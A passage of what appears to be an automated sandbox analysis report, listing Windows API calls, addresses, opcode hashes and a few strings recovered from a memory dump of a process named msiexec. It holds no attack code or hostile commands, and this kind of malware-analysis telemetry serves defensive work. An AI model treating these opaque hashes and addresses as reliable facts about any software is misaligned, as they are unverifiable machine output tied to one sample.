                                                              • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                              • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                              • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item
                                                              • String ID:
                                                              • API String ID: 3888421826-0
                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                              APIs
                                                              • memset.MSVCRT ref: 00417B7B
                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                              • String ID:
                                                              • API String ID: 3727323765-0
                                                              • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                              • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F673
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                              • strlen.MSVCRT ref: 0040F6A2
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F6E2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                              • strlen.MSVCRT ref: 0040F70D
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                              APIs
                                                              • memset.MSVCRT ref: 00402FD7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                              • strlen.MSVCRT ref: 00403006
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$CloseHandle
                                                              • String ID: General
                                                              • API String ID: 3722638380-26480598
                                                              • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                              • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                              • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                              • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                              APIs
                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                              • String ID:
                                                              • API String ID: 764393265-0
                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Time$System$File$LocalSpecific
                                                              • String ID:
                                                              • API String ID: 979780441-0
                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                              APIs
                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$DialogHandleModuleParam
                                                              • String ID:
                                                              • API String ID: 1386444988-0
                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                              APIs
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: InvalidateMessageRectSend
                                                              • String ID: d=E
                                                              • API String ID: 909852535-3703654223
                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                              APIs
                                                              • wcschr.MSVCRT ref: 0040F79E
                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcschr$memcpywcslen
                                                              • String ID: "
                                                              • API String ID: 1983396471-123907689
                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                              APIs
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FilePointer_memicmpmemcpy
                                                              • String ID: URL
                                                              • API String ID: 2108176848-3574463123
                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                              APIs
                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemcpy
                                                              • String ID: %2.2X
                                                              • API String ID: 2789212964-323797159
                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf
                                                              • String ID: %%-%d.%ds
                                                              • API String ID: 3988819677-2008345750
                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E770
                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: F^@
                                                              • API String ID: 568519121-3652327722
                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PlacementWindowmemset
                                                              • String ID: WinPos
                                                              • API String ID: 4036792311-2823255486
                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                              • DeleteObject.GDI32(00000000), ref: 004125E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@DeleteObject
                                                              • String ID: r!A
                                                              • API String ID: 1103273653-628097481
                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                              APIs
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 383090722-1948609170
                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                              • API String ID: 2773794195-880857682
                                                              • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                              • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                              • memset.MSVCRT ref: 0042BAAE
                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                              APIs
                                                                • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                              • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040A908
                                                              • free.MSVCRT ref: 0040A92B
                                                              • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                              • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                              • free.MSVCRT ref: 0040B201
                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                              • free.MSVCRT ref: 0040B224
                                                              • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$memcpy$mallocwcslen
                                                              • String ID:
                                                              • API String ID: 726966127-0
                                                              • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                              • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                              APIs
                                                              • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                              • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                              • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
